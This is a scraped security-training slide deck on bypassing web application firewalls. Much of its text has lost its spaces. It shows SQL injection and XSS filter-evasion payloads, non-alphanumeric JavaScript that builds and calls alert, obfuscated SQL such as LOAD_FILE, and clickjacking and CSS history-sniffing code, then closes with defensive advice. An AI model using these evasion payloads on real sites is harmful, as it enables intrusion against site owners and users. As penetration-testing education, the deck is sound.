Scribd Logo
Upload

Welcome to Scribd!

  • Bypassing Waf

    Uploaded by

    MayurS.Dhagiya
    9 views39 pages
    Bypassing Waf

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Bypassing Waf

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    9 views39 pages

    Bypassing Waf

    Uploaded by

    MayurS.Dhagiya
    Bypassing Waf

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 39

    Bypassing Web Application

    Firewalls (WAFs)
    Ing. Pavol Luptk, CISSP, CEH
    Lead Security Consultant

    www.nethemba.com
    www.nethemba.com

    NethembaAllAboutSecurity

    HighlyexperiencedcertifiedITsecurityexperts(CISSP,C|EH,SCSecA)
    Corebusiness:Allkindsofpenetrationtests,comprehensiveweb
    applicationsecurityaudits,localsystemandwifisecurityaudits,security
    consulting,forensicanalysis,secureVoIP,ultrasecuresystems
    OWASPactivists:LeadersofSlovak/CzechOWASPchapters,coauthors
    ofthemostrecognizedOWASPTestingGuidev3.0,workingonnewversion
    WearetheonlyoneinSlovakia/CzechRepublicthatoffer:

    PenetrationtestsandsecurityauditsofSAP

    SecurityauditofsmartRFIDcards

    Uniqueownandsponsoredsecurityresearchinmanyareas(see
    ourreferencesVulnerabilitiesinpublictransportSMStickets,
    crackedthemostusedMifareClassicRFIDcards)

    www.nethemba.com

    WhatareWAFs?

    EmergedfromIDS/IPSfocusedonHTTP
    protocolandHTTPrelatedattacks
    Usuallycontainalotofcomplexregexprules
    tomatch
    Supportspecialfeatureslikecookieencryption,
    CSRFprotection,etc.
    Exceptoffreemod_securitytheyarequite
    expensive(andoftenthereisnocorrelation
    betweenthepriceandtheirfilteringcapabilities)

    www.nethemba.com

    WAFsimplementations

    Usuallytheyaredeployedinblacklistingmode
    thatismorevulnerabletobypassesand
    targetedattacks
    Applicationcontext(typeofallowedinputs)is
    necessarytoknowfordeployingofmoresecure
    whitelistingmode
    AllWAFscanbybypassed
    WAFisjustaworkaround,butfromthesecurity

    pointofviewitcanbecosteffective
    www.nethemba.com

    WAFfilterrules

    DirectlyreflectsWAFeffectiveness
    FormostWAFvendorstheyareclosely
    guardedsecretsmostdeterminedattackers
    areabletobypassthemwithoutseeingthe
    actualrules
    OpensourceWAFs(mod_security,PHPIDS)
    haveopensourceruleswhichisbetterfor
    morescrutinybyskilledpenetrationtesters

    www.nethemba.com

    TypicalWAFbypasses
    Blocked Attack

    Undetected modification

    'or 1=1--

    ' or 2=2--

    alert(0)

    %00alert(0)

    <script>alert(0)</script>

    <script type=vbscript>MsgBox(0)</script>

    ' or ''''='r

    '/**/OR/**/''''='

    <script>alert(0)</script>

    <img src=x:x onerror=alert(0)></img>

    <img src=x:x onerror=alert(0)//></img>

    <img src=http://url
    onload=alert(0)//></img>

    1 or 1=1

    (1)or(1)=(1)

    eval(name)

    x=this.name
    X(0?$:name+1)

    www.nethemba.com

    Yes,WAFmaybealsobevulnerable!

    WAFalsoincreasestheattacksurfaceofa
    targetorganization
    WAFmaybethetargetofandvulnerableto
    maliciousattacks,e.g.XSS,SQLinjection,
    denialofserviceattacks,remotecode
    executionvulnerabilities
    Thesevulnerabilitieshavebeenfoundinall
    typesofWAFproducts(!)

    www.nethemba.com

    Typicalbypassflow
    1.Findoutwhichcharacters/sequencesare
    allowedbyWAFs
    2.Makeanobfuscatedversionofyourinjected
    payload
    3.TestitandwatchfortheWAF/application
    response
    4.Ifitdoesnotwork,modifyitandtrystep2.

    www.nethemba.com

    Javascriptobfuscation

    Javascripthasverypowerfulfeatures

    JavascriptpayloadisusedinXSSattacks

    Itisfullofevals,expressionclosures,generator
    expressions,iterators,specialcharactersand
    shortcuts
    Supportsalotofencodings(unicode
    multibytecharacters,hexadecimal,octal,
    combinationofallofthem)
    SupportsXOR,Encryption,Base64

    www.nethemba.com

    Nonalphanumericjavascriptcode
    Evenifonlyfewcharactersarealloweditis
    possibletoconstructfullyfunctionalcode:

    _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;
    $$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")
    [$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}
    +"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"")
    [___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({}
    +"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}
    [$]+"")[__]+(($==$)+"")[___];($)[$$][$$]($$$+"('"+$_$+"')")()

    ([,,,,,,]=!{}+{},[[,]=!!+][+++])()[++++](~)

    www.nethemba.com

    Let'sbypassWAF!

    Examplesituation:WAFblocksalpha
    charactersandnumbers(probablynotavery
    realsituation,justproofofconcept:)
    Allowsonlyfewspecialcharacters(){}_=[];$!
    +<>
    Let'sgeneratefullynonalphanumericjavascript
    code!

    www.nethemba.com

    PossibilitiesofJavascriptlanguage
    Wecanusenumberstoobtainasinglecharacter
    inastring,e.g.indexzeroforaccessingthefirst
    characterabc[0]

    Wecanuseaddition(+),subtraction(),
    multiplication(*),division(/),modulus(%),
    increment(++),decrement()

    Weknowthatmathematicaloperatorsperform
    automaticnumericconversionandstring
    operatorsperformautomaticstringconversion

    www.nethemba.com

    Sourceofdifferentalphanumeric
    charactersinJavascript

    Javascript object /
    error state
    {}+''

    String result
    [object Object]

    +[][+[]]

    NaN

    [][+[]]+[]

    undefined

    [![]]+[]

    false

    [!![]]+[]

    true

    www.nethemba.com

    ShortestPossibleWaystoCreate
    ZerowithoutUsingNumbers
    Characters
    +[]
    +`'`
    +`
    -[]
    -`'`
    -`

    Result
    0
    0
    0
    0
    0
    0

    www.nethemba.com

    Generatingnumbers

    +[]//0

    ++[[]][+[]]//1

    +!+[]//1

    ++[++[[]][+[]]][+[]]//2

    !+[]+!+[]//2

    ++[++[++[[]][+[]]][+[]]][+[]]//3

    !+[]+!+[]+!+[]//3

    www.nethemba.com

    Gainalphacharacterswithout
    directlyusingthem

    WhendefineJavascriptobjectusingtheobject
    literalandconcatenatewithstring,theresultis
    [objectObject]

    _={}+'';//[objectObject]

    alert(_[1])//returns'o'character

    www.nethemba.com

    Generatestringalertwithoutusing
    anyalphanumericcharacters

    Let'sstartwith'a'

    WhatJavascriptobjectcontains'a'?

    Wecanuse'NaN'(NotaNumber)

    Accessemptystringwithindex0(undefined)
    andconverttonumber(NaN)
    +[][+[]]//result:NaN

    www.nethemba.com

    Generating'a'character

    NaN[1]='a'

    ++[[]][+[]]//1

    +[][+[]]+[]//resultstring:NaN

    (+[][+[]]+[])[++[[]][+[]]]//a

    Wehavecharacter'a'

    www.nethemba.com

    Generating'l'character

    Usebooleanfalse

    Wecanuse!(NOT)operator

    e.g.''==0//true

    Useblankarray(string)andthenNOToperator
    toobtainboolean,wrapwith[]andconvertitto
    string
    ([![]]+[])//stringfalse

    www.nethemba.com

    Generating'l'character

    ++[++[[]][+[]]][+[]]//2

    ([![]]+[])//stringfalse

    'false'[2]=([![]]+[])[++[++[[]][+
    []]][+[]]]//'l'
    Wehave'l'character!

    www.nethemba.com

    Generating'e'character

    It'seasy,wecanusebooleantrue

    ([!![]]+[])//string'true'

    ++[++[++[[]][+[]]][+[]]][+[]]//3

    'true'[3]=([!![]]+[])[++[++[++
    [[]][+[]]][+[]]][+[]]]//e
    Andwehave'e'character!

    www.nethemba.com

    Generating'r'character

    It'seasy,wecanusebooleantrue

    ([!![]]+[])//string'true'

    ++[[]][+[]]//1

    'true'[1]=([!![]]+[])[++[[]][+
    []]]//r
    Andwehave'r'character!

    www.nethemba.com

    Generating't'character

    It'seasy,wecanusebooleantrue

    ([!![]]+[])//string'true'

    +[]//0

    'true'[0]=([!![]]+[])[+[]]//t

    Andwehave't'character!

    www.nethemba.com

    Andnowwehave'alert'string!
    (+[][+[]]+[])[++[[]][+[]]]+([![]]+
    [])[++[++[[]][+[]]][+[]]]+([!![]]+
    [])[++[++[++[[]][+[]]][+[]]][+[]]]+
    ([!![]]+[])[++[[]][+[]]]+([!![]]+
    [])[+[]]//string'alert'

    www.nethemba.com

    Howtoexecutethecodeofourchoice?

    Itisnecessarytoreturnwindowobjectto
    accessallpropertiesofwindow
    Ifyoucanaccesstoaconstructor,youcan
    accessFunctionconstructortoexecute
    arbitrarycode
    Theshortestpossiblewaytogetwindowis:
    alert((1,[].sort)())//shows
    windowobject!

    WorksinallbrowsersexceptIE

    www.nethemba.com

    Howtogenerate'sort'string

    Weknowhowtogeneratestring'alert'

    Weneedtogenerate'sort'string
    'false'[3]=([![]]+[])[++[++[++[[]]
    [+[]]][+[]]][+[]]]//'s'

    Wecangain'o'from[]+{}[objectObject]
    ([]+{})[++[[]][+[]]]//o

    Wehavealreadygenerated'r'and't'

    www.nethemba.com

    Andnowwehave'sort'string
    ([![]]+[])[++[++[++[[]][+[]]][+[]]][+
    []]]+([]+{})[++[[]][+[]]]+([!![]]+[])
    [++[[]][+[]]]+([!![]]+[])[+[]]
    //string'sort'

    www.nethemba.com

    Let'sbuildittogethercallalert(1)

    (1,[].sort)().alert(1)
    Afterchangingnumber1andallalpha
    characterstotheirobfuscatedversionweget:

    ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]]
    [+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++
    [[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]
    +[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+
    []]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]]
    [+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+
    ([!![]]+[])[+[]]](++[[]][+[]])

    //callsalert(1)!

    www.nethemba.com

    Howtocallanyarbitrary
    Javascriptfunction

    Usingthearrayconstructor(accessingthe
    constructortwicefromanarrayobjectreturns
    Function):
    [].constructor.constructor(alert(1
    ))()
    Weneedtogeneratetherest'c','n','u'letters,
    gainthemfromtheoutputof[].sortfunction:
    functionsort(){[nativecode]}

    www.nethemba.com

    SQLobfuscation

    WhatisobfuscationofSQLinjectionvector?
    DifferentDBMShavedifferentSQLsyntax,
    mostofthemsupportUnicode,Base64,hex,
    octalandbinaryrepresentation,escaping,
    hashingalgorithms(MD5,SHA1)
    Manyblacklistedcharacterscanbereplaced
    bytheirfunctionalalternatives(0xA0inMySQL)
    Obfuscatedcommentsitisdifficultto

    determinewhatisacommentandwhatisnot
    www.nethemba.com

    SQLobfuscationexamples

    SELECTCONCAT(char
    (x'70617373',b'11101110110111101110010011
    00100'))
    s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
    SELECT
    LOAD_FILE(0x633A5C626F6F742E696E69)
    (M)
    SELECT(extractvalue(0x3C613E61646D696E3
    C2F613,0x2F61))

    www.nethemba.com

    NewSQLfeatures

    MySQL/PostgreSQLsupportsXMLfunctions:
    SELECTUpdateXML('<scriptx=_></script>',
    '/script/@x','src=//0x.lv');

    HTML5supportslocalDBstorage(SQLite
    3.1+)(openDatabaseobject)canbemisused
    forpersistentXSS,localSQLinjectionattacks

    www.nethemba.com

    Existingobfuscationtools

    Hackvertorhttp://hackvertor.co.uk/public

    HackBar
    https://addons.mozilla.org/enUS/firefox/addon/hack

    Malzillahttp://malzilla.sourceforge.net/

    Yourimagination:)

    www.nethemba.com

    Summary

    WAFsarejustworkarounds!

    ThebestsolutionistocareaboutsecurityineverySDLC
    phaseandstrictlyvalidateallinputsandoutputsinthe
    application
    Usewhitelistinginsteadofblacklisting(bothinthe
    applicationandWAF!)
    Usemultilayersecurity3rdlayerdatabasearchitectureor
    databasefirewalls

    forSQLusepreparedstatements

    forHTMLuseHTMLPurifierorOWASPAntiSamyproject

    www.nethemba.com

    References

    WebApplicationObfuscation
    http://www.amazon.com/WebApplicationObfuscati

    XSSAttacks:CrossSiteScriptingExploitsand
    Defense
    http://www.amazon.com/XSSAttacksScriptingExp
    SpecialthankstoMarioHeiderichandStefano
    DiPaola

    www.nethemba.com

    UIredressingattacksclickjacking
    <style>
    iframe{filter:alpha(opacity=0);opacity:0;
    position:absolute;top:0px;left0px;
    height:300px;width:250px;}
    img{position:absolute;top:0px;left:0px;
    height:300px;width:250px;}
    </style>
    <imgsrc=WHATTHEUSERSSEES/>

    <iframesrc=WHATTHEUSERISACTUALLYINTERACTING

    WITH></iframe>
    www.nethemba.com

    Clickjackingprotection

    BlocksusingXFRAME/OPTIONS:NEVER

    <body>
    <script>
    if(top!=self)document.write('<plaintext>');
    </script>
    ...

    www.nethemba.com

    CSSHistoryattack
    <style>
    a{position:relative;}
    a:visited{position:absolute;}
    </style>
    <aid=vhref=http://www.google.com/>Google</a>
    <script>
    varl=document.getElementById(v);
    varc=getComputedStyle(l).position;
    c==absolute?alert(visited):alert(notvisited);

    </script>

    www.nethemba.com

    CSSHistoryexploitationmethods

    Socialnetworkdeanonymizationattacks

    SessionID/CSRFtokenlocalbruteforceattack

    LANscanners

    FixedinFirefox4.0,currentbrowsersare
    vulnerable

    www.nethemba.com

    You might also like